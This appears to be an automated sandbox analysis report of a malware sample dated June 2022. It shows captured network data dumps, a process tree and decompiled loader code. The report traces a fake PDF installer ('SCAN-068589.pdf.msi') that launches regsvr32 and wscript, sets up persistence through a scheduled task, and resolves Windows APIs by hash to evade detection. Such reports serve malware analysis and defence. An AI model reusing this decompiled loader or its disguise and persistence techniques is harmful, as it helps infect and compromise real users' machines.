6c 76 62 74 2b 64 65 55 78 51 7a 30 35 43 0d 0a 4b 4d 46 4d 5a 55 6d 62 59 6a 52 7a 67 55 31 56 49 34 31 4d 56 44 65 Data Ascii: SU9WnOaSiMtyUWduM2VxTFo2RkI0OERleWJqNDl4RVVDdERUQW1GRnVIWnU0clFnbjNlcUxaNkZCNDhEZXliajQ5eEVVQ3REVEFtRkZ1SFp1NHJRZ24zZXFMWjZGQjQ4RGV5Ymo0OXhFVUN0RFRBbUZGdUhadTRyUWduM2VxTFo2RkI0OERlefKRPDmSuF1DqLlcQc2+TnX0on00oqlvbt+deUxQz05CKMFMZUmbYjRzgU1VI41MVDe
2022-06-16 18:23:00 UTC	1097	IN	Data Raw: 5a 68 41 36 4b 42 70 47 63 6c 45 58 48 46 77 52 0d 0a 48 69 38 31 57 6d 59 73 57 30 78 6b 46 67 77 53 47 6c 74 4c 44 43 41 78 51 33 51 32 4d 53 41 4a 5a 69 6b 62 4a 43 4e 56 55 68 73 39 41 6b 35 41 48 41 49 34 50 31 74 47 51 6a 52 4b 49 52 59 57 0d 0a 46 78 68 58 58 46 67 68 4d 43 49 51 4b 44 73 69 42 6d 59 78 47 6a 30 32 45 52 51 64 4d 67 51 62 51 57 56 78 54 43 68 54 4e 53 31 42 53 69 63 41 57 52 63 45 56 55 38 5a 4c 44 6b 69 46 69 67 78 0d 0a 59 52 6b 30 50 31 55 70 50 52 52 64 48 46 46 6e 48 46 59 57 42 43 41 75 46 69 6b 33 51 42 67 72 41 31 6b 51 43 31 70 65 48 55 55 6d 4e 78 55 77 4d 57 45 44 4b 54 4a 56 4f 6a 38 57 57 77 51 30 0d 0a 46 51 39 52 43 52 52 4d 57 6a 59 31 4e 6b 5a 64 4a 51 68 5a 46 67 4e 5a 58 42 63 77 49 55 4e 30 4d 44 45 35 47 57 59 Data Ascii: ZhA6KBpGclEXHFwRHi81WmYsW0xkFgwSGltLDCAxQ3Q2MSAJZikbJCNVUhs9Ak5AHAI4P1tGQjRKIRYWFxhXXFghMCIQKDsiBmYxGj02ERQdMgQbQWVxTChTNS1BSicAWRcEVU8ZLDkiFigxYRk0P1UpPRRdHFFnHFYWBCAuFik3QBgrA1kQC1peHUUmNxUwMWEDKTJVOj8WWwQ0FQ9RCRRMWjY1NkZdJQhZFgNZXBcwIUN0MDE5GWY
2022-06-16 18:23:00 UTC	1113	IN	Data Raw: 0d 0a 6f 4c 4f 66 33 35 36 38 69 59 48 44 6c 49 4f 2f 72 73 4f 77 74 63 7a 42 76 70 36 46 6e 35 54 4c 4f 58 68 6c 56 57 4e 30 5a 46 52 68 62 57 5a 47 56 55 68 36 64 52 52 79 63 57 64 47 4d 30 31 78 0d 0a 5a 46 6f 65 52 6d 6f 30 47 45 52 46 65 55 4a 71 46 44 6c 59 52 58 56 44 56 45 52 30 51 55 31 47 5a 6e 56 6f 57 6c 55 30 55 6c 46 48 62 68 4e 6c 55 55 78 36 4e 6d 5a 43 66 44 68 55 5a 57 6c 69 0d 0a 65 6a 51 70 65 46 56 56 55 33 52 55 56 46 46 74 56 6b 5a 6c 53 45 70 31 4a 48 4a 42 5a 33 34 7a 64 58 48 49 57 72 4a 47 78 6a 53 38 52 4f 46 35 35 6d 71 77 4f 66 78 46 30 55 50 77 52 45 52 42 0d 0a 66 55 5a 57 64 56 68 61 5a 54 52 69 55 58 64 75 73 6d 54 77 54 64 73 33 78 30 4f 31 4f 63 56 6b 65 47 4e 72 4e 54 68 35 52 46 52 43 64 55 56 56 51 47 78 48 52 33 52 Data Ascii: oLOf3568iYHDlIO/rsOwtczBvp6Fn5TLOXhlVWN0ZFRhbWZGVUh6dRRycWdGM01xZFoeRmo0GERFeUJqFDlYRXVDVER0QU1GZnVoWlU0UlFHbhNlUUx6NmZCfDhUZWliejQpeFVVU3RUVFFtVkZlSEp1JHJBZ34zdXHIWrJGxjS8ROF55mqwOfxF0UPwRERBfUZWdVhaZTRiUXdusmTwTds3x0O1OcVkeGNrNTh5RFRCdUVVQGxHR3R
2022-06-16 18:23:00 UTC	1129	IN	Data Raw: 68 61 45 7a 51 41 55 55 70 75 66 32 55 6b 54 46 6f 32 4a 45 4a 48 4f 47 6c 6c 4f 32 49 72 4e 42 52 34 43 56 55 69 64 44 42 55 4c 32 31 47 52 6e 56 49 0d 0a 4b 58 56 5a 63 6a 74 6e 51 7a 4d 32 63 51 6c 61 4e 6b 5a 43 4e 46 6c 45 46 33 6c 50 61 6e 6b 35 4f 55 56 56 51 78 46 45 4f 6b 46 41 52 67 39 31 44 56 70 31 4e 42 64 52 46 47 34 65 5a 53 46 4d 0d 0a 47 7a 5a 47 51 6c 49 34 4e 6d 56 55 59 69 63 30 65 6e 68 46 56 54 42 30 4e 6c 52 73 62 51 52 47 4e 45 68 33 64 58 68 79 4d 47 63 61 4d 77 74 78 54 46 6f 32 52 6a 45 30 56 55 51 45 65 55 39 71 0d 0a 65 6a 6b 33 52 56 56 44 64 45 51 31 51 52 39 47 61 33 55 63 57 6a 73 30 63 6c 45 43 62 6c 31 6c 58 45 77 41 4e 67 64 43 4e 44 67 68 5a 51 70 69 52 7a 52 39 65 41 70 56 51 33 51 33 56 44 4e 74 0d 0a 61 30 59 33 53 Data Ascii: haEzQAUUpuf2UkTFo2JEJHOGllO2IrNBR4CVUidDBUL21GRnVIKXVZcjtnQzM2cQlaNkZCNFlEF3lPank5OUVVQxFEOkFARg91DVp1NBdRFG4eZSFMGzZGQlI4NmVUYic0enhFVTB0NlRsbQRGNEh3dXhyMGcaMwtxTFo2RjE0VUQEeU9qejk3RVVDdEQ1QR9Ga3UcWjs0clECbl1lXEwANgdCNDghZQpiRzR9eApVQ3Q3VDNta0Y3S
2022-06-16 18:23:00 UTC	1145	IN	Data Raw: 49 4c 63 6c 46 6e 62 71 56 77 68 6e 4e 61 4e 6b 59 43 6f 53 32 7a 57 6e 6c 69 61 72 53 74 62 62 4a 71 0d 0a 51 33 52 45 6c 4e 4a 34 73 58 6c 31 53 46 70 31 70 32 65 6d 57 47 34 7a 5a 54 48 65 54 38 46 35 51 6a 51 34 78 50 52 73 6c 56 55 30 4f 58 69 46 78 56 61 44 65 31 52 42 62 55 62 57 59 4c 39 6c 0d 0a 64 54 52 79 30 65 68 37 78 46 70 78 54 46 72 32 79 46 66 44 42 30 52 6c 65 57 4c 6b 49 63 35 48 52 56 56 44 4e 4d 6c 42 74 6c 4a 47 52 6e 58 49 31 6d 44 44 54 56 46 6e 62 76 50 75 5a 4c 74 6c 0d 0a 4e 6b 5a 43 4e 4c 4e 52 6b 6b 5a 69 61 6a 52 35 38 6c 43 69 66 48 52 45 56 4d 48 6b 55 37 46 4b 53 46 70 31 4e 50 74 45 6b 46 45 7a 5a 58 45 4d 30 69 4f 78 66 54 51 34 52 4f 58 2b 64 35 30 4c 0d 0a 4f 58 68 46 6c 63 56 68 73 32 74 42 62 55 5a 47 38 31 32 74 53 Data Ascii: ILclFnbqVwhnNaNkYCoS2zWnliarStbbJqQ3RElNJ4sXl1SFp1p2emWG4zZTHeT8F5QjQ4xPRslVU0OXiFxVaDe1RBbUbWYL9ldTRy0eh7xFpxTFr2yFfDB0RleWLkIc5HRVVDNMlBtlJGRnXI1mDDTVFnbvPuZLtlNkZCNLNRkkZiajR58lCifHREVMHkU7FKSFp1NPtEkFEzZXEM0iOxfTQ4ROX+d50LOXhFlcVhs2tBbUZG812tS
2022-06-16 18:23:00 UTC	1161	IN	Data Raw: 4a 52 5a 39 59 37 64 58 46 4d 57 6a 5a 47 51 6a 51 34 0d 0a 52 47 56 35 59 6e 6f 34 4d 47 67 4a 37 55 74 6b 52 46 52 42 62 55 5a 47 64 55 68 5a 64 54 52 79 44 64 39 6d 49 77 6e 4a 52 45 6f 71 2f 6b 6f 6b 59 50 64 74 61 57 4a 71 4e 44 6c 6f 53 56 78 54 0d 0a 64 6b 52 55 51 57 31 47 52 6e 57 33 70 59 72 4c 63 6c 46 6e 62 6e 4e 6c 63 55 77 57 6a 6b 35 53 4e 44 68 45 5a 58 6c 69 61 6a 51 35 65 45 56 56 6f 33 39 4e 52 4e 33 56 54 6c 5a 31 53 46 70 31 0d 0a 4e 48 4a 52 5a 32 30 7a 5a 58 48 67 34 6a 35 57 2f 6f 77 77 56 48 6e 42 61 6e 70 73 69 6e 42 56 56 55 4e 30 52 4c 52 4b 5a 46 5a 45 64 55 68 61 64 54 52 79 55 5a 69 52 7a 4a 70 78 54 46 6f 32 0d 0a 42 6b 49 30 4f 4e 6a 64 63 58 4a 71 4e 44 6c 34 52 56 56 44 64 45 52 55 51 57 33 4b 54 58 78 59 74 73 30 38 59 Data Ascii: JRZ9Y7dXFMWjZGQjQ4RGV5Yno4MGgJ7UtkRFRBbUZGdUhZdTRyDd9mIwnJREoq/kokYPdtaWJqNDloSVxTdkRUQW1GRnW3pYrLclFnbnNlcUwWjk5SNDhEZXliajQ5eEVVo39NRN3VTlZ1SFp1NHJRZ20zZXHg4j5W/owwVHnBanpsinBVVUN0RLRKZFZEdUhadTRyUZiRzJpxTFo2BkI0ONjdcXJqNDl4RVVDdERUQW3KTXxYts08Y
2022-06-16 18:23:00 UTC	1177	IN	Data Raw: 69 52 0d 0a 47 42 4a 32 58 4b 58 4a 75 62 32 47 70 45 46 31 68 70 32 56 79 77 38 50 51 6b 56 41 64 45 52 55 41 42 70 42 56 6f 71 33 70 59 72 55 42 56 5a 33 54 44 62 32 61 45 31 61 4e 6b 61 65 30 6a 42 55 0d 0a 5a 58 6c 69 61 6a 51 35 65 45 56 56 51 33 52 45 56 45 46 74 52 6b 5a 31 53 46 70 30 4e 48 4a 52 6d 4a 48 4d 6d 73 50 51 58 79 61 35 76 63 76 48 39 42 4a 2b 63 6b 67 78 71 6d 46 48 56 55 4e 30 0d 0a 54 4c 4e 4a 66 55 5a 47 64 55 68 61 64 54 52 79 55 57 64 75 4d 32 56 78 54 46 6f 32 52 6b 49 30 4f 55 52 6c 65 53 4a 71 4e 44 6c 34 52 56 56 44 64 45 52 55 51 55 6b 69 52 6d 57 33 70 59 72 4c 0d 0a 63 6c 46 6e 62 73 79 61 6a 72 4e 61 4e 6b 5a 43 4e 44 68 45 5a 58 6c 69 61 6a 51 34 65 45 56 56 51 6e 52 45 56 48 32 4b 54 6c 5a 58 54 63 6c 73 4e 6e 4a 52 5a Data Ascii: iRGBJ2XKXJub2GpEF1hp2Vyw8PQkVAdERUABpBVoq3pYrUBVZ3TDb2aE1aNkae0jBUZXliajQ5eEVVQ3REVEFtRkZ1SFp0NHJRmJHMmsPQXya5vcvH9BJ+ckgxqmFHVUN0TLNJfUZGdUhadTRyUWduM2VxTFo2RkI0OURleSJqNDl4RVVDdERUQUkiRmW3pYrLclFnbsyajrNaNkZCNDhEZXliajQ4eEVVQnREVH2KTlZXTclsNnJRZ
2022-06-16 18:23:00 UTC	1193	IN	Data Raw: 56 64 56 5a 70 33 4a 61 4e 6b 62 43 4e 44 68 59 5a 58 6c 69 66 41 56 76 53 79 4e 67 64 55 7a 33 62 66 4a 57 43 6e 76 6a 64 6d 78 4b 34 6b 31 52 39 32 34 7a 0d 0a 4a 58 46 4d 57 6b 42 33 35 41 66 48 63 47 46 4d 65 31 38 52 44 46 4a 77 50 58 51 5a 63 31 4e 35 59 58 35 77 54 34 64 67 6f 51 35 45 61 72 5a 56 35 56 35 48 63 4a 55 4b 6b 6e 36 48 42 66 78 59 0d 0a 66 31 7a 6c 43 71 31 47 73 32 76 63 53 2b 42 72 51 63 31 47 52 6a 56 49 57 6e 57 67 51 73 68 58 69 41 4d 61 51 4d 68 72 30 48 66 4b 42 6f 64 32 6f 55 74 45 57 59 67 4b 75 58 59 71 64 76 42 78 0d 0a 63 58 5a 48 63 63 5a 43 69 6d 31 70 44 42 68 70 74 6c 66 6c 58 42 56 33 4d 77 33 35 65 54 55 45 48 31 6e 61 58 6d 71 45 4f 58 67 42 56 55 4e 30 73 6d 64 62 57 51 39 79 79 48 79 38 51 53 46 48 0d 0a 42 6c 48 Data Ascii: VdVZp3JaNkbCNDhYZXlifAVvSyNgdUz3bfJWCnvjdmxK4k1R924zJXFMWkB35AfHcGFMe18RDFJwPXQZc1N5YX5wT4dgoQ5EarZV5V5HcJUKkn6HBfxYf1zlCq1Gs2vcS+BrQc1GRjVIWnWgQshXiAMaQMhr0HfKBod2oUtEWYgKuXYqdvBxcXZHccZCim1pDBhptlflXBV3Mw35eTUEH1naXmqEOXgBVUN0smdbWQ9yyHy8QSFHBlH
2022-06-16 18:23:00 UTC	1209	IN	Data Raw: 56 73 6c 2f 6d 67 57 4f 63 65 51 4c 6e 46 61 5a 55 59 49 48 79 55 75 39 5a 6b 4e 41 54 47 42 52 57 56 35 79 0d 0a 56 58 78 79 51 51 52 47 61 56 4d 75 42 79 31 46 48 47 35 75 63 69 49 41 55 48 41 56 54 52 70 65 74 41 33 77 63 63 56 33 37 48 42 55 34 57 56 47 57 6e 56 49 57 6c 6b 4c 53 6d 37 50 55 66 39 61 0d 0a 6f 58 4f 36 43 61 4a 39 33 41 65 30 57 6e 6c 69 61 6f 51 78 65 45 46 57 51 33 52 4d 5a 45 31 64 59 6e 5a 42 65 47 4a 46 64 45 49 4a 56 77 59 44 43 55 45 77 61 72 5a 32 78 67 53 77 64 50 56 4a 0d 0a 79 6c 71 4d 43 63 52 31 6d 58 4f 6b 64 49 78 78 6e 58 5a 47 52 45 78 72 59 51 56 71 59 48 74 66 45 31 52 56 66 58 59 48 41 6e 4e 38 43 53 52 55 48 56 4d 57 42 62 6c 4a 33 57 54 72 52 65 68 6c 0d 0a 2f 56 79 47 64 37 46 35 6b 6b 54 34 51 34 56 57 67 67 4b Data Ascii: Vsl/mgWOceQLnFaZUYIHyUu9ZkNATGBRWV5yVXxyQQRGaVMuBy1FHG5uciIAUHAVTRpetA3wccV37HBU4WVGWnVIWlkLSm7PUf9aoXO6CaJ93Ae0WnliaoQxeEFWQ3RMZE1dYnZBeGJFdEIJVwYDCUEwarZ2xgSwdPVJylqMCcR1mXOkdIxxnXZGRExrYQVqYHtfE1RVfXYHAnN8CSRUHVMWBblJ3WTrRehl/VyGd7F5kkT4Q4VWggK

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: msiexec.exePID: 2460, Parent PID: 2348

General

Target ID:	1
Start time:	20:22:13
Start date:	16/06/2022
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\SCAN-068589.pdf.msi"
Imagebase:	0xfff30000
File size:	128512 bytes
MD5 hash:	AC2E7152124CEED36846BD1B6592A00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 3004, Parent PID: 404

General

Target ID:	2
Start time:	20:22:15
Start date:	16/06/2022
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0xfff30000
File size:	128512 bytes
MD5 hash:	AC2E7152124CEED36846BD1B6592A00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2948, Parent PID: 3004

General

Target ID:	5
Start time:	20:22:57
Start date:	16/06/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Imagebase:	0xff3a0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 1244, Parent PID: 3004

General

Target ID:	6
Start time:	20:22:57
Start date:	16/06/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs
Imagebase:	0xffda0000
File size:	168960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1568, Parent PID: 2948

General

Target ID:	7
Start time:	20:22:57
Start date:	16/06/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Imagebase:	0x370000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskeng.exePID: 2840, Parent PID: 876

General

Target ID:	10
Start time:	20:23:52
Start date:	16/06/2022
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {4CFB7DD2-D1A8-412D-8316-3EFD3FFEBE4B} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff7c0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2008, Parent PID: 2840

General

Target ID:	11
Start time:	20:23:53
Start date:	16/06/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Imagebase:	0xff3a0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2852, Parent PID: 2008

General

Target ID:	12
Start time:	20:23:53
Start date:	16/06/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Imagebase:	0x370000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 2852, Parent PID: 2008COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15%
Total number of Nodes:	1483
Total number of Limit Nodes:	28

Executed Functions

Function 6E4168E0 Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1395
libraryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E4168E0() {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed char _v13;
				char _v14;
				signed char _v15;
				void* _v16;
				signed int _v17;
				char _v18;
				char _v19;
				signed char _v20;
				void* _v21;
				signed int _v22;
				char _v23;
				char _v24;
				signed char _v25;
				void* _v26;
				signed int _v27;
				char _v28;
				char _v29;
				signed char _v30;
				void* _v31;
				signed int _v32;
				char _v33;
				char _v34;
				signed char _v35;
				void* _v36;
				signed int _v37;
				char _v38;
				char _v39;
				signed char _v40;
				void* _v41;
				signed int _v42;
				char _v43;
				char _v44;
				signed char _v45;
				void* _v46;
				signed int _v47;
				char _v48;
				char _v49;
				signed char _v50;
				void* _v51;
				signed int _v52;
				char _v53;
				char _v54;
				signed char _v55;
				void* _v56;
				signed int _v57;
				char _v58;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr* _v256;
				intOrPtr _v260;
				intOrPtr* _v264;
				signed int _v268;
				intOrPtr* _v272;
				intOrPtr _v276;
				intOrPtr* _v280;
				signed int _v284;
				intOrPtr* _v288;
				intOrPtr _v292;
				intOrPtr* _v296;
				signed int _v300;
				intOrPtr* _v304;
				intOrPtr _v308;
				intOrPtr* _v312;
				signed int _v316;
				intOrPtr* _v320;
				intOrPtr _v324;
				intOrPtr* _v328;
				signed int _v332;
				intOrPtr* _v336;
				intOrPtr _v340;
				intOrPtr* _v344;
				signed int _v348;
				intOrPtr _v352;
				intOrPtr* _v356;
				intOrPtr* _v360;
				signed int _v364;
				intOrPtr* _v368;
				intOrPtr _v372;
				intOrPtr* _v376;
				signed int _v380;
				intOrPtr* _v384;
				intOrPtr _v388;
				signed char _v392;
				intOrPtr _v396;
				char _v400;
				signed char _v404;
				intOrPtr _v408;
				char _v412;
				signed char _v416;
				signed char _v420;
				char _v424;
				intOrPtr _v428;
				CHAR* _v432;
				char _v436;
				signed char _v440;
				intOrPtr _v444;
				char _v448;
				signed char _v452;
				intOrPtr _v456;
				signed char _v460;
				char _v464;
				signed char _v468;
				CHAR* _v472;
				char _v476;
				signed char _v480;
				CHAR* _v484;
				char _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr* _v500;
				intOrPtr _v504;
				char _v508;
				intOrPtr* _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr* _v540;
				intOrPtr _v544;
				signed int _v548;
				intOrPtr* _v552;
				signed int _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr* _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr* _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				CHAR* _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr* _v612;
				intOrPtr _v616;
				signed int _v620;
				intOrPtr* _v624;
				signed int _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr* _v644;
				intOrPtr _v648;
				char _v652;
				intOrPtr* _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				CHAR* _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr* _v684;
				intOrPtr _v688;
				signed int _v692;
				intOrPtr* _v696;
				signed int _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr* _v716;
				intOrPtr _v720;
				char _v724;
				intOrPtr* _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr* _v756;
				intOrPtr _v760;
				signed int _v764;
				intOrPtr* _v768;
				signed int _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr* _v788;
				intOrPtr _v792;
				char _v796;
				intOrPtr* _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr* _v828;
				intOrPtr _v832;
				signed int _v836;
				intOrPtr* _v840;
				signed int _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr* _v860;
				intOrPtr _v864;
				char _v868;
				intOrPtr* _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr* _v900;
				intOrPtr _v904;
				signed int _v908;
				intOrPtr* _v912;
				signed int _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr* _v932;
				intOrPtr _v936;
				char _v940;
				intOrPtr* _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				CHAR* _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr* _v972;
				intOrPtr _v976;
				signed int _v980;
				intOrPtr* _v984;
				signed int _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr* _v1004;
				intOrPtr _v1008;
				char _v1012;
				intOrPtr* _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr* _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr* _v1056;
				signed int _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr* _v1076;
				intOrPtr _v1080;
				char _v1084;
				intOrPtr* _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr* _v1184;
				intOrPtr _v1188;
				signed int _v1192;
				intOrPtr* _v1196;
				signed int _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				signed int _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _t1407;
				intOrPtr _t1468;
				intOrPtr _t1483;
				intOrPtr _t1498;
				intOrPtr _t1513;
				intOrPtr _t1528;
				intOrPtr _t1543;
				intOrPtr _t1558;
				intOrPtr _t1573;
				intOrPtr _t1698;

				_v14 = 0;
				_v100 = E6E413FE0( &_v14);
				if(( *(_v100 + 0xc) & 0x000000ff) != 0) {
					E6E41F3D0(_v100, 0xc, 0, 0x7edb509, 0x1010101);
					 *(_v100 + 0xc) = 0;
				}
				_v508 = _v100;
				_v372 = _v1216;
				_v892 =  *[fs:0x30];
				_v1180 =  *((intOrPtr*)(_v892 + 0xc));
				_v1184 =  *((intOrPtr*)(_v1180 + 0xc));
				_v368 = _v1184;
				do {
					_v104 =  *((intOrPtr*)(_v368 + 0x18));
					_v172 = _v104;
					_v1188 = _v104 +  *((intOrPtr*)(_v104 + 0x3c));
					_t1698 = _v1188;
					_v1112 =  *((intOrPtr*)(_t1698 + 0x78));
					_v1108 =  *((intOrPtr*)(_t1698 + 0x7c));
					_v168 = _v104 + _v1112;
					_v164 = _v1108;
					if(_v168 == _v172) {
						_v420 = 0;
					} else {
						_v420 = 1;
					}
					_v15 = _v420;
					if((_v15 & 0x000000ff) != 0) {
						_v64 =  *((intOrPtr*)(_v168 + 0x18));
						while(1) {
							_v1192 = _v64;
							_v64 = _v64 - 1;
							if(_v1192 == 0) {
								goto L16;
							}
							_v1196 = _v172 +  *((intOrPtr*)(_v172 +  *((intOrPtr*)(_v168 + 0x20)) + _v64 * 4));
							_v360 = _v1196;
							_v364 = 0x811c9dc5;
							while(1) {
								_v16 =  *_v360;
								_v360 = _v360 + 1;
								_v5 = _v16;
								if(_v5 == 0) {
									break;
								}
								_v364 = (_v5 ^ _v364) * 0x1000193;
							}
							_v1200 = _v364;
							if(_v1200 != 0xe463da3c) {
								continue;
							} else {
								_v1208 = _v172 +  *((intOrPtr*)(_v168 + 0x1c));
								_v1204 = _v172 +  *((intOrPtr*)(_v168 + 0x24));
								_v496 = _v172 +  *((intOrPtr*)(_v1208 + ( *(_v1204 + _v64 * 2) & 0x0000ffff) * 4));
								_v372 = _v496;
							}
							goto L18;
						}
					}
					goto L16;
					L18:
					_v512 =  &_v508;
					_v516 =  *_v512;
					_v520 = _v372(_v516);
					if(_v520 == 0) {
						_v18 = 0;
						_v528 = E6E411FF0(L"KERNEL32.dll", 0);
						_v428 = E6E4140D0( &_v18);
						E6E41F670(_v428);
						_v524 = _v428;
						_v528(_v524);
					}
					_v19 = 0;
					_v464 = E6E414FD0( &_v19);
					E6E41F730(_v464);
					_v580 = _v464;
					_v388 = _v1220;
					_v532 =  *[fs:0x30];
					_v536 =  *((intOrPtr*)(_v532 + 0xc));
					_v540 =  *((intOrPtr*)(_v536 + 0xc));
					_v384 = _v540;
					do {
						_v108 =  *((intOrPtr*)(_v384 + 0x18));
						_v184 = _v108;
